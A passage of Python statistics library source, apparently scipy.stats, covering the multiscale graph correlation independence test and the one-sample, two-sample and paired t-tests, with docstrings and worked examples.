WeightedTauResult(correlation=-0.4157652301037516, pvalue=nan)
>>> stats.weightedtau(y, x, rank=None)
WeightedTauResult(correlation=-0.7181341329699028, pvalue=nan)
"""
x = np.asarray(x).ravel()
y = np.asarray(y).ravel()
if x.size != y.size:
raise ValueError("All inputs to `weightedtau` must be of the same size, "
"found x-size %s and y-size %s" % (x.size, y.size))
if not x.size:
return WeightedTauResult(np.nan, np.nan) # Return NaN if arrays are empty
# If there are NaNs we apply _toint64()
if np.isnan(np.sum(x)):
x = _toint64(x)
if np.isnan(np.sum(y)):
y = _toint64(y)
# Reduce unsupported types to ranks (int64)
if x.dtype != y.dtype:
if x.dtype != np.int64:
x = _toint64(x)
if y.dtype != np.int64:
y = _toint64(y)
else:
if x.dtype not in (np.int32, np.int64, np.float32, np.float64):
x = _toint64(x)
y = _toint64(y)
if rank is True:
return WeightedTauResult((
_weightedrankedtau(x, y, None, weigher, additive) +
_weightedrankedtau(y, x, None, weigher, additive)
) / 2, np.nan)
if rank is False:
rank = np.arange(x.size, dtype=np.intp)
elif rank is not None:
rank = np.asarray(rank).ravel()
if rank.size != x.size:
raise ValueError("All inputs to `weightedtau` must be of the same size, "
"found x-size %s and rank-size %s" % (x.size, rank.size))
return WeightedTauResult(_weightedrankedtau(x, y, rank, weigher, additive), np.nan)
# FROM MGCPY: https://github.com/neurodata/mgcpy
class _ParallelP(object):
"""
Helper function to calculate parallel p-value.
"""
def __init__(self, x, y, compute_distance, random_states):
self.x = x
self.y = y
self.compute_distance = compute_distance
self.random_states = random_states
def __call__(self, index):
permx = self.random_states[index].permutation(self.x)
permy = self.random_states[index].permutation(self.y)
# calculate permuted stats, store in null distribution
perm_stat = _mgc_stat(permx, permy, self.compute_distance)[0]
return perm_stat
def _perm_test(x, y, stat, compute_distance, reps=1000, workers=-1,
random_state=None):
r"""
Helper function that calculates the p-value. See below for uses.
Parameters
----------
x, y : ndarray
`x` and `y` have shapes `(n, p)` and `(n, q)`.
stat : float
The sample test statistic.
compute_distance : callable
A function that computes the distance or similarity among the samples
within each data matrix. Set to `None` if `x` and `y` are already
distance matrices.
reps : int, optional
The number of replications used to estimate the null when using the
permutation test. The default is 1000 replications.
workers : int or map-like callable, optional
If `workers` is an int the population is subdivided into `workers`
sections and evaluated in parallel (uses
`multiprocessing.Pool <multiprocessing>`). Supply `-1` to use all cores
available to the Process. Alternatively supply a map-like callable,
such as `multiprocessing.Pool.map` for evaluating the population in
parallel. This evaluation is carried out as `workers(func, iterable)`.
Requires that `func` be pickleable.
random_state : int or np.random.RandomState instance, optional
If already a RandomState instance, use it.
If seed is an int, return a new RandomState instance seeded with seed.
If None, use np.random.RandomState. Default is None.
Returns
-------
pvalue : float
The sample test p-value.
null_dist : list
The approximated null distribution.
"""
# generate seeds for each rep (change to new parallel random number
# capabilities in numpy >= 1.17+)
random_state = check_random_state(random_state)
random_states = [np.random.RandomState(random_state.randint(1 << 32,
size=4, dtype=np.uint32)) for _ in range(reps)]
# parallelizes with specified workers over number of reps and set seeds
mapwrapper = MapWrapper(workers)
parallelp = _ParallelP(x=x, y=y, compute_distance=compute_distance,
random_states=random_states)
null_dist = np.array(list(mapwrapper(parallelp, range(reps))))
# calculate p-value and significant permutation map through list
pvalue = (null_dist >= stat).sum() / reps
# Correct for a p-value of 0: with a finite number of random permutations,
# an estimated p-value of exactly 0 is not meaningful, so 1 / reps is
# reported instead.
if pvalue == 0:
pvalue = 1 / reps
return pvalue, null_dist
def _euclidean_dist(x):
return cdist(x, x)
MGCResult = namedtuple('MGCResult', ('stat', 'pvalue', 'mgc_dict'))
def multiscale_graphcorr(x, y, compute_distance=_euclidean_dist, reps=1000,
workers=1, is_twosamp=False, random_state=None):
r"""
Computes the Multiscale Graph Correlation (MGC) test statistic.
Specifically, for each point, MGC finds the :math:`k`-nearest neighbors for
one property (e.g. cloud density), and the :math:`l`-nearest neighbors for
the other property (e.g. grass wetness) [1]_. This pair :math:`(k, l)` is
called the "scale". A priori, however, it is not know which scales will be
most informative. So, MGC computes all distance pairs, and then efficiently
computes the distance correlations for all scales. The local correlations
illustrate which scales are relatively informative about the relationship.
The key, therefore, to successfully discover and decipher relationships
between disparate data modalities is to adaptively determine which scales
are the most informative, and the geometric implication for the most
informative scales. Doing so not only provides an estimate of whether the
modalities are related, but also provides insight into how the
determination was made. This is especially important in high-dimensional
data, where simple visualizations do not reveal relationships to the
unaided human eye. Characterizations of this implementation in particular
have been derived from and benchmarked within [2]_.
Parameters
----------
x, y : ndarray
If ``x`` and ``y`` have shapes ``(n, p)`` and ``(n, q)`` where `n` is
the number of samples and `p` and `q` are the number of dimensions,
then the MGC independence test will be run. Alternatively, ``x`` and
``y`` can have shapes ``(n, n)`` if they are distance or similarity
matrices, and ``compute_distance`` must be set to ``None``. If ``x``
and ``y`` have shapes ``(n, p)`` and ``(m, p)``, an unpaired
two-sample MGC test will be run.
compute_distance : callable, optional
A function that computes the distance or similarity among the samples
within each data matrix. Set to ``None`` if ``x`` and ``y`` are
already distance matrices. The default uses the euclidean norm metric.
If you are calling a custom function, either create the distance
matrix before-hand or create a function of the form
``compute_distance(x)`` where `x` is the data matrix for which
pairwise distances are calculated.
reps : int, optional
The number of replications used to estimate the null when using the
permutation test. The default is ``1000``.
workers : int or map-like callable, optional
If ``workers`` is an int the population is subdivided into ``workers``
sections and evaluated in parallel (uses ``multiprocessing.Pool
<multiprocessing>``). Supply ``-1`` to use all cores available to the
Process. Alternatively supply a map-like callable, such as
``multiprocessing.Pool.map`` for evaluating the p-value in parallel.
This evaluation is carried out as ``workers(func, iterable)``.
Requires that `func` be pickleable. The default is ``1``.
is_twosamp : bool, optional
If `True`, a two sample test will be run. If ``x`` and ``y`` have
shapes ``(n, p)`` and ``(m, p)``, this option will be overridden and
set to ``True``. Set to ``True`` if ``x`` and ``y`` both have shapes
``(n, p)`` and a two sample test is desired. The default is ``False``.
random_state : int or np.random.RandomState instance, optional
If already a RandomState instance, use it.
If seed is an int, return a new RandomState instance seeded with seed.
If None, use np.random.RandomState. Default is None.
Returns
-------
stat : float
The sample MGC test statistic within `[-1, 1]`.
pvalue : float
The p-value obtained via permutation.
mgc_dict : dict
Contains additional useful returns containing the following
keys:
- mgc_map : ndarray
A 2D representation of the latent geometry of the relationship.
- opt_scale : (int, int)
The estimated optimal scale as a `(x, y)` pair.
- null_dist : list
The null distribution derived from the permuted matrices
See Also
--------
pearsonr : Pearson correlation coefficient and p-value for testing
non-correlation.
kendalltau : Calculates Kendall's tau.
spearmanr : Calculates a Spearman rank-order correlation coefficient.
Notes
-----
A description of the process of MGC and applications on neuroscience data
can be found in [1]_. It is performed using the following steps:
#. Two distance matrices :math:`D^X` and :math:`D^Y` are computed and
modified to be mean zero columnwise. This results in two
:math:`n \times n` distance matrices :math:`A` and :math:`B` (the
centering and unbiased modification) [3]_.
#. For all values :math:`k` and :math:`l` from :math:`1, ..., n`,
* The :math:`k`-nearest neighbor and :math:`l`-nearest neighbor graphs
are calculated for each property. Here, :math:`G_k (i, j)` indicates
the :math:`k`-smallest values of the :math:`i`-th row of :math:`A`
and :math:`H_l (i, j)` indicates the :math:`l`-smallest values of
the :math:`i`-th row of :math:`B`
* Let :math:`\circ` denote the entry-wise matrix product; then local
correlations are summed and normalized using the following statistic:
.. math::
c^{kl} = \frac{\sum_{ij} A G_k B H_l}
{\sqrt{\sum_{ij} A^2 G_k \times \sum_{ij} B^2 H_l}}
#. The MGC test statistic is the smoothed optimal local correlation of
:math:`\{ c^{kl} \}`. Denote the smoothing operation as :math:`R(\cdot)`
(which essentially sets all isolated large correlations to 0 and leaves
connected large correlations the same as before; see [3]_). MGC is,
.. math::
MGC_n (x, y) = \max_{(k, l)} R \left(c^{kl} \left( x_n, y_n \right)
\right)
The test statistic returns a value between :math:`(-1, 1)` since it is
normalized.
The p-value returned is calculated using a permutation test. This process
is completed by first randomly permuting :math:`y` to estimate the null
distribution and then calculating the probability of observing a test
statistic, under the null, at least as extreme as the observed test
statistic.
MGC requires at least 5 samples to run with reliable results. It can also
handle high-dimensional data sets.
In addition, by manipulating the input data matrices, the two-sample
testing problem can be reduced to the independence testing problem [4]_.
Given sample data :math:`U` and :math:`V` of sizes :math:`p \times n` and
:math:`p \times m`, data matrices :math:`X` and :math:`Y` can be created as
follows:
.. math::
X = [U | V] \in \mathcal{R}^{p \times (n + m)}
Y = [0_{1 \times n} | 1_{1 \times m}] \in \mathcal{R}^{(n + m)}
Then, the MGC statistic can be calculated as normal. This methodology can
be extended to similar tests such as distance correlation [4]_.
.. versionadded:: 1.4.0
References
----------
.. [1] Vogelstein, J. T., Bridgeford, E. W., Wang, Q., Priebe, C. E.,
Maggioni, M., & Shen, C. (2019). Discovering and deciphering
relationships across disparate data modalities. ELife.
.. [2] Panda, S., Palaniappan, S., Xiong, J., Swaminathan, A.,
Ramachandran, S., Bridgeford, E. W., ... Vogelstein, J. T. (2019).
mgcpy: A Comprehensive High Dimensional Independence Testing Python
Package. ArXiv:1907.02088 [Cs, Stat].
.. [3] Shen, C., Priebe, C.E., & Vogelstein, J. T. (2019). From distance
correlation to multiscale graph correlation. Journal of the American
Statistical Association.
.. [4] Shen, C. & Vogelstein, J. T. (2018). The Exact Equivalence of
Distance and Kernel Methods for Hypothesis Testing. ArXiv:1806.05514
[Cs, Stat].
Examples
--------
>>> from scipy.stats import multiscale_graphcorr
>>> x = np.arange(100)
>>> y = x
>>> stat, pvalue, _ = multiscale_graphcorr(x, y, workers=-1)
>>> '%.1f, %.3f' % (stat, pvalue)
'1.0, 0.001'
Alternatively,
>>> x = np.arange(100)
>>> y = x
>>> mgc = multiscale_graphcorr(x, y)
>>> '%.1f, %.3f' % (mgc.stat, mgc.pvalue)
'1.0, 0.001'
To run an unpaired two-sample test,
>>> x = np.arange(100)
>>> y = np.arange(79)
>>> mgc = multiscale_graphcorr(x, y, random_state=1)
>>> '%.3f, %.2f' % (mgc.stat, mgc.pvalue)
'0.033, 0.02'
or, if the shapes of the inputs are the same,
>>> x = np.arange(100)
>>> y = x
>>> mgc = multiscale_graphcorr(x, y, is_twosamp=True)
>>> '%.3f, %.1f' % (mgc.stat, mgc.pvalue)
'-0.008, 1.0'
"""
if not isinstance(x, np.ndarray) or not isinstance(y, np.ndarray):
raise ValueError("x and y must be ndarrays")
# convert arrays of type (n,) to (n, 1)
if x.ndim == 1:
x = x[:, np.newaxis]
elif x.ndim != 2:
raise ValueError("Expected a 2-D array `x`, found shape "
"{}".format(x.shape))
if y.ndim == 1:
y = y[:, np.newaxis]
elif y.ndim != 2:
raise ValueError("Expected a 2-D array `y`, found shape "
"{}".format(y.shape))
nx, px = x.shape
ny, py = y.shape
# check for NaNs
_contains_nan(x, nan_policy='raise')
_contains_nan(y, nan_policy='raise')
# check for positive or negative infinity and raise error
if np.sum(np.isinf(x)) > 0 or np.sum(np.isinf(y)) > 0:
raise ValueError("Inputs contain infinities")
if nx != ny:
if px == py:
# reshape x and y for two sample testing
is_twosamp = True
else:
raise ValueError("Shape mismatch, x and y must have shape [n, p] "
"and [n, q] or have shape [n, p] and [m, p].")
if nx < 5 or ny < 5:
raise ValueError("MGC requires at least 5 samples to give reasonable "
"results.")
# convert x and y to float
x = x.astype(np.float64)
y = y.astype(np.float64)
# check that compute_distance is a callable (or None)
if not callable(compute_distance) and compute_distance is not None:
raise ValueError("Compute_distance must be a function.")
# check that the number of reps is a non-negative integer (a warning is
# raised if it is under 1000)
if not isinstance(reps, int) or reps < 0:
raise ValueError("Number of reps must be an integer greater than 0.")
elif reps < 1000:
msg = ("The number of replications is low (under 1000), and p-value "
"calculations may be unreliable. Use the p-value result, with "
"caution!")
warnings.warn(msg, RuntimeWarning)
if is_twosamp:
x, y = _two_sample_transform(x, y)
# calculate MGC stat
stat, stat_dict = _mgc_stat(x, y, compute_distance)
stat_mgc_map = stat_dict["stat_mgc_map"]
opt_scale = stat_dict["opt_scale"]
# calculate permutation MGC p-value
pvalue, null_dist = _perm_test(x, y, stat, compute_distance, reps=reps,
workers=workers, random_state=random_state)
# save all stats (other than stat/p-value) in dictionary
mgc_dict = {"mgc_map": stat_mgc_map,
"opt_scale": opt_scale,
"null_dist": null_dist}
return MGCResult(stat, pvalue, mgc_dict)
def _mgc_stat(x, y, compute_distance):
r"""
Helper function that calculates the MGC stat. See above for use.
Parameters
----------
x, y : ndarray
`x` and `y` have shapes `(n, p)` and `(n, q)` or `(n, n)` and `(n, n)`
if distance matrices.
compute_distance : callable
A function that computes the distance or similarity among the samples
within each data matrix. Set to `None` if `x` and `y` are already
distance matrices.
Returns
-------
stat : float
The sample MGC test statistic within `[-1, 1]`.
stat_dict : dict
Contains additional useful returns containing the following
keys:
- stat_mgc_map : ndarray
MGC-map of the statistics.
- opt_scale : (float, float)
The estimated optimal scale as a `(x, y)` pair.
"""
# set distx and disty to x and y when compute_distance = None
distx = x
disty = y
if compute_distance is not None:
# compute distance matrices for x and y
distx = compute_distance(x)
disty = compute_distance(y)
# calculate MGC map and optimal scale
stat_mgc_map = _local_correlations(distx, disty, global_corr='mgc')
n, m = stat_mgc_map.shape
if m == 1 or n == 1:
# The statistic at the global scale is the one calculated at the maximal
# nearest neighbors. There is not enough local scale to search over, so
# default to the global scale.
stat = stat_mgc_map[m - 1][n - 1]
opt_scale = m * n
else:
samp_size = len(distx) - 1
# threshold to find connected region of significant local correlations
sig_connect = _threshold_mgc_map(stat_mgc_map, samp_size)
# maximum within the significant region
stat, opt_scale = _smooth_mgc_map(sig_connect, stat_mgc_map)
stat_dict = {"stat_mgc_map": stat_mgc_map,
"opt_scale": opt_scale}
return stat, stat_dict
def _threshold_mgc_map(stat_mgc_map, samp_size):
r"""
Finds a connected region of significance in the MGC-map by thresholding.
Parameters
----------
stat_mgc_map : ndarray
All local correlations within `[-1,1]`.
samp_size : int
The sample size of original data.
Returns
-------
sig_connect : ndarray
A binary matrix with 1's indicating the significant region.
"""
m, n = stat_mgc_map.shape
# 0.02 is simply an empirical threshold, this can be set to 0.01 or 0.05
# with varying levels of performance. Threshold is based on a beta
# approximation.
per_sig = 1 - (0.02 / samp_size) # Percentile to consider as significant
threshold = samp_size * (samp_size - 3)/4 - 1/2 # Beta approximation
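# ppf of the symmetric beta approximation, mapped from [0, 1] onto the
# correlation range [-1, 1]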
threshold = distributions.beta.ppf(per_sig, threshold, threshold) * 2 - 1
# The statistic at the global scale is the one calculated at the maximal
# nearest neighbors. The threshold is the maximum over the global and local
# scales.
threshold = max(threshold, stat_mgc_map[m - 1][n - 1])
# find the largest connected component of significant correlations
sig_connect = stat_mgc_map > threshold
if np.sum(sig_connect) > 0:
sig_connect, _ = measurements.label(sig_connect)
_, label_counts = np.unique(sig_connect, return_counts=True)
# skip the first element in label_counts, as it is count(zeros)
max_label = np.argmax(label_counts[1:]) + 1
sig_connect = sig_connect == max_label
else:
sig_connect = np.array([[False]])
return sig_connect
def _smooth_mgc_map(sig_connect, stat_mgc_map):
"""
Finds the smoothed maximal within the significant region R.
If the area of R is too small, it returns the last local correlation. Otherwise,
returns the maximum within significant_connected_region.
Parameters
----------
sig_connect: ndarray
A binary matrix with 1's indicating the significant region.
stat_mgc_map: ndarray
All local correlations within `[-1, 1]`.
Returns
-------
stat : float
The sample MGC statistic within `[-1, 1]`.
opt_scale: (float, float)
The estimated optimal scale as an `(x, y)` pair.
"""
m, n = stat_mgc_map.shape
# The statistic at the global scale is the one calculated at the maximal
# nearest neighbors. By default, the statistic and optimal scale are global.
stat = stat_mgc_map[m - 1][n - 1]
opt_scale = [m, n]
if np.linalg.norm(sig_connect) != 0:
# proceed only when the connected region's area is sufficiently large
# 0.02 is simply an empirical threshold, this can be set to 0.01 or 0.05
# with varying levels of performance
if np.sum(sig_connect) >= np.ceil(0.02 * max(m, n)) * min(m, n):
max_corr = max(stat_mgc_map[sig_connect])
# find all scales within significant_connected_region that maximize
# the local correlation
max_corr_index = np.where((stat_mgc_map >= max_corr) & sig_connect)
if max_corr >= stat:
stat = max_corr
k, l = max_corr_index
one_d_indices = k * n + l # 2D to 1D indexing
k = np.max(one_d_indices) // n
l = np.max(one_d_indices) % n
opt_scale = [k+1, l+1] # adding 1s to match R indexing
return stat, opt_scale
def _two_sample_transform(u, v):
"""
Helper function that concatenates x and y for two sample MGC stat. See
above for use.
Parameters
----------
u, v : ndarray
`u` and `v` have shapes `(n, p)` and `(m, p)`,
Returns
-------
x : ndarray
`u` and `v` concatenated along `axis=0`; `x` thus has shape
`(n + m, p)`.
y : ndarray
Label matrix for `x` where 0 refers to samples that come from `u` and
1 refers to samples that come from `v`. `y` thus has shape `(n + m, 1)`.
"""
nx = u.shape[0]
ny = v.shape[0]
x = np.concatenate([u, v], axis=0)
y = np.concatenate([np.zeros(nx), np.ones(ny)], axis=0).reshape(-1, 1)
return x, y
#####################################
# INFERENTIAL STATISTICS #
#####################################
Ttest_1sampResult = namedtuple('Ttest_1sampResult', ('statistic', 'pvalue'))
def ttest_1samp(a, popmean, axis=0, nan_policy='propagate'):
"""
Calculate the T-test for the mean of ONE group of scores.
This is a two-sided test for the null hypothesis that the expected value
(mean) of a sample of independent observations `a` is equal to the given
population mean, `popmean`.
Parameters
----------
a : array_like
Sample observation.
popmean : float or array_like
Expected value in null hypothesis. If array_like, then it must have the
same shape as `a` excluding the axis dimension.
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
t-statistic.
pvalue : float or array
Two-sided p-value.
Examples
--------
>>> from scipy import stats
>>> np.random.seed(7654567) # fix seed to get the same result
>>> rvs = stats.norm.rvs(loc=5, scale=10, size=(50,2))
Test if mean of random sample is equal to true mean, and different mean.
We reject the null hypothesis in the second case and don't reject it in
the first case.
>>> stats.ttest_1samp(rvs,5.0)
(array([-0.68014479, -0.04323899]), array([ 0.49961383, 0.96568674]))
>>> stats.ttest_1samp(rvs,0.0)
(array([ 2.77025808, 4.11038784]), array([ 0.00789095, 0.00014999]))
Examples using axis and non-scalar dimension for population mean.
>>> stats.ttest_1samp(rvs,[5.0,0.0])
(array([-0.68014479, 4.11038784]), array([ 4.99613833e-01, 1.49986458e-04]))
>>> stats.ttest_1samp(rvs.T,[5.0,0.0],axis=1)
(array([-0.68014479, 4.11038784]), array([ 4.99613833e-01, 1.49986458e-04]))
>>> stats.ttest_1samp(rvs,[[5.0],[0.0]])
(array([[-0.68014479, -0.04323899],
[ 2.77025808, 4.11038784]]), array([[ 4.99613833e-01, 9.65686743e-01],
[ 7.89094663e-03, 1.49986458e-04]]))
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.ttest_1samp(a, popmean, axis)
n = a.shape[axis]
df = n - 1
d = np.mean(a, axis) - popmean
v = np.var(a, axis, ddof=1)
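# standard error of the sample mean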
denom = np.sqrt(v / n)
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t)
return Ttest_1sampResult(t, prob)
def _ttest_finish(df, t):
"""Common code between all 3 t-test functions."""
prob = distributions.t.sf(np.abs(t), df) * 2 # use np.abs to get upper tail
if t.ndim == 0:
t = t[()]
return t, prob
def _ttest_ind_from_stats(mean1, mean2, denom, df):
d = mean1 - mean2
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t)
return (t, prob)
def _unequal_var_ttest_denom(v1, n1, v2, n2):
vn1 = v1 / n1
vn2 = v2 / n2
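# Welch-Satterthwaite approximation for the degrees of freedom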
with np.errstate(divide='ignore', invalid='ignore'):
df = (vn1 + vn2)**2 / (vn1**2 / (n1 - 1) + vn2**2 / (n2 - 1))
# If df is undefined, variances are zero (assumes n1 > 0 & n2 > 0).
# Hence it doesn't matter what df is as long as it's not NaN.
df = np.where(np.isnan(df), 1, df)
denom = np.sqrt(vn1 + vn2)
return df, denom
def _equal_var_ttest_denom(v1, n1, v2, n2):
df = n1 + n2 - 2.0
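# pooled sample variance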
svar = ((n1 - 1) * v1 + (n2 - 1) * v2) / df
denom = np.sqrt(svar * (1.0 / n1 + 1.0 / n2))
return df, denom
Ttest_indResult = namedtuple('Ttest_indResult', ('statistic', 'pvalue'))
def ttest_ind_from_stats(mean1, std1, nobs1, mean2, std2, nobs2,
equal_var=True):
r"""
T-test for means of two independent samples from descriptive statistics.
This is a two-sided test for the null hypothesis that two independent
samples have identical average (expected) values.
Parameters
----------
mean1 : array_like
The mean(s) of sample 1.
std1 : array_like
The standard deviation(s) of sample 1.
nobs1 : array_like
The number(s) of observations of sample 1.
mean2 : array_like
The mean(s) of sample 2.
std2 : array_like
The standard deviations(s) of sample 2.
nobs2 : array_like
The number(s) of observations of sample 2.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
Returns
-------
statistic : float or array
The calculated t-statistics.
pvalue : float or array
The two-tailed p-value.
See Also
--------
scipy.stats.ttest_ind
Notes
-----
.. versionadded:: 0.16.0
References
----------
.. [1] https://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] https://en.wikipedia.org/wiki/Welch%27s_t-test
Examples
--------
Suppose we have the summary data for two samples, as follows::
                   Sample   Sample
           Size     Mean    Variance
Sample 1     13     15.0      87.5
Sample 2     11     12.0      39.0
Apply the t-test to this data (with the assumption that the population
variances are equal):
>>> from scipy.stats import ttest_ind_from_stats
>>> ttest_ind_from_stats(mean1=15.0, std1=np.sqrt(87.5), nobs1=13,
... mean2=12.0, std2=np.sqrt(39.0), nobs2=11)
Ttest_indResult(statistic=0.9051358093310269, pvalue=0.3751996797581487)
For comparison, here is the data from which those summary statistics
were taken. With this data, we can compute the same result using
`scipy.stats.ttest_ind`:
>>> a = np.array([1, 3, 4, 6, 11, 13, 15, 19, 22, 24, 25, 26, 26])
>>> b = np.array([2, 4, 6, 9, 11, 13, 14, 15, 18, 19, 21])
>>> from scipy.stats import ttest_ind
>>> ttest_ind(a, b)
Ttest_indResult(statistic=0.905135809331027, pvalue=0.3751996797581486)
Suppose we instead have binary data and would like to apply a t-test to
compare the proportion of 1s in two independent groups::
                  Number of    Sample     Sample
           Size     ones        Mean     Variance
Sample 1    150      30         0.2        0.16
Sample 2    200      45         0.225      0.174375
The sample mean :math:`\hat{p}` is the proportion of ones in the sample
and the variance for a binary observation is estimated by
:math:`\hat{p}(1-\hat{p})`.
>>> ttest_ind_from_stats(mean1=0.2, std1=np.sqrt(0.16), nobs1=150,
... mean2=0.225, std2=np.sqrt(0.17437), nobs2=200)
Ttest_indResult(statistic=-0.564327545549774, pvalue=0.5728947691244874)
For comparison, we could compute the t statistic and p-value using
arrays of 0s and 1s and `scipy.stats.ttest_ind`, as above.
>>> group1 = np.array([1]*30 + [0]*(150-30))
>>> group2 = np.array([1]*45 + [0]*(200-45))
>>> ttest_ind(group1, group2)
Ttest_indResult(statistic=-0.5627179589855622, pvalue=0.573989277115258)
"""
if equal_var:
df, denom = _equal_var_ttest_denom(std1**2, nobs1, std2**2, nobs2)
else:
df, denom = _unequal_var_ttest_denom(std1**2, nobs1,
std2**2, nobs2)
res = _ttest_ind_from_stats(mean1, mean2, denom, df)
return Ttest_indResult(*res)
def ttest_ind(a, b, axis=0, equal_var=True, nan_policy='propagate'):
"""
Calculate the T-test for the means of *two independent* samples of scores.
This is a two-sided test for the null hypothesis that 2 independent samples
have identical average (expected) values. This test assumes that the
populations have identical variances by default.
Parameters
----------
a, b : array_like
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
.. versionadded:: 0.11.0
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
The calculated t-statistic.
pvalue : float or array
The two-tailed p-value.
Notes
-----
We can use this test, if we observe two independent samples from
the same or different population, e.g. exam scores of boys and
girls or of two ethnic groups. The test measures whether the
average (expected) value differs significantly across samples. If
we observe a large p-value, for example larger than 0.05 or 0.1,
then we cannot reject the null hypothesis of identical average scores.
If the p-value is smaller than the threshold, e.g. 1%, 5% or 10%,
then we reject the null hypothesis of equal averages.
References
----------
.. [1] https://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] https://en.wikipedia.org/wiki/Welch%27s_t-test
Examples
--------
>>> from scipy import stats
>>> np.random.seed(12345678)
Test with sample with identical means:
>>> rvs1 = stats.norm.rvs(loc=5,scale=10,size=500)
>>> rvs2 = stats.norm.rvs(loc=5,scale=10,size=500)
>>> stats.ttest_ind(rvs1,rvs2)
(0.26833823296239279, 0.78849443369564776)
>>> stats.ttest_ind(rvs1,rvs2, equal_var = False)
(0.26833823296239279, 0.78849452749500748)
`ttest_ind` underestimates p for unequal variances:
>>> rvs3 = stats.norm.rvs(loc=5, scale=20, size=500)
>>> stats.ttest_ind(rvs1, rvs3)
(-0.46580283298287162, 0.64145827413436174)
>>> stats.ttest_ind(rvs1, rvs3, equal_var = False)
(-0.46580283298287162, 0.64149646246569292)
When n1 != n2, the equal variance t-statistic is no longer equal to the
unequal variance t-statistic:
>>> rvs4 = stats.norm.rvs(loc=5, scale=20, size=100)
>>> stats.ttest_ind(rvs1, rvs4)
(-0.99882539442782481, 0.3182832709103896)
>>> stats.ttest_ind(rvs1, rvs4, equal_var = False)
(-0.69712570584654099, 0.48716927725402048)
T-test with different means, variance, and n:
>>> rvs5 = stats.norm.rvs(loc=8, scale=20, size=100)
>>> stats.ttest_ind(rvs1, rvs5)
(-1.4679669854490653, 0.14263895620529152)
>>> stats.ttest_ind(rvs1, rvs5, equal_var = False)
(-0.94365973617132992, 0.34744170334794122)
"""
a, b, axis = _chk2_asarray(a, b, axis)
# check both a and b
cna, npa = _contains_nan(a, nan_policy)
cnb, npb = _contains_nan(b, nan_policy)
contains_nan = cna or cnb
if npa == 'omit' or npb == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
return mstats_basic.ttest_ind(a, b, axis, equal_var)
if a.size == 0 or b.size == 0:
return Ttest_indResult(np.nan, np.nan)
v1 = np.var(a, axis, ddof=1)
v2 = np.var(b, axis, ddof=1)
n1 = a.shape[axis]
n2 = b.shape[axis]
if equal_var:
df, denom = _equal_var_ttest_denom(v1, n1, v2, n2)
else:
df, denom = _unequal_var_ttest_denom(v1, n1, v2, n2)
res = _ttest_ind_from_stats(np.mean(a, axis), np.mean(b, axis), denom, df)
return Ttest_indResult(*res)
Ttest_relResult = namedtuple('Ttest_relResult', ('statistic', 'pvalue'))
def ttest_rel(a, b, axis=0, nan_policy='propagate'):
"""
Calculate the t-test on TWO RELATED samples of scores, a and b.
This is a two-sided test for the null hypothesis that 2 related or
repeated samples have identical average (expected) values.
Parameters
----------
a, b : array_like
The arrays must have the same shape.
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
t-statistic.
pvalue : float or array
Two-sided p-value.
Notes
-----
Examples for use are scores of the same set of students in
different exams, or repeated sampling from the same units. The
test measures whether the average score differs significantly
across samples (e.g. exams). If we observe a large p-value, for
example greater than 0.05 or 0.1 then we cannot reject the null
hypothesis of identical average scores. If the p-value is smaller
than the threshold, e.g. 1%, 5% or 10%, then we reject the null
hypothesis of equal averages. Small p-values are associated with
large t-statistics.
References
----------
https://en.wikipedia.org/wiki/T-test#Dependent_t-test_for_paired_samples
Examples
--------
>>> from scipy import stats
>>> np.random.seed(12345678) # fix random seed to get same numbers
>>> rvs1 = stats.norm.rvs(loc=5,scale=10,size=500)
>>> rvs2 = (stats.norm.rvs(loc=5,scale=10,size=500) +
... stats.norm.rvs(scale=0.2,size=500))
>>> stats.ttest_rel(rvs1,rvs2)
(0.24101764965300962, 0.80964043445811562)
>>> rvs3 = (stats.norm.rvs(loc=8,scale=10,size=500) +
... stats.norm.rvs(scale=0.2,size=500))
>>> stats.ttest_rel(rvs1,rvs3)
(-3.9995108708727933, 7.3082402191726459e-005)
"""
a, b, axis = _chk2_asarray(a, b, axis)
cna, npa = _contains_nan(a, nan_policy)
cnb, npb = _contains_nan(b, nan_policy)
contains_nan = cna or cnb
if npa == 'omit' or npb == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
m = ma.mask_or(ma.getmask(a), ma.getmask(b))
aa = ma.array(a, mask=m, copy=True)
bb = ma.array(b, mask=m, copy=True)
return mstats_basic.ttest_rel(aa, bb, axis)
if a.shape[axis] != b.shape[axis]:
raise ValueError('unequal length arrays')
if a.size == 0 or b.size == 0:
return Ttest_relResult(np.nan, np.nan)
n = a.shape[axis]
df = n - 1
d = (a - b).astype(np.float64)
v = np.var(d, axis, ddof=1)
dm = np.mean(d, axis)
denom = np.sqrt(v / n)
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(dm, denom)
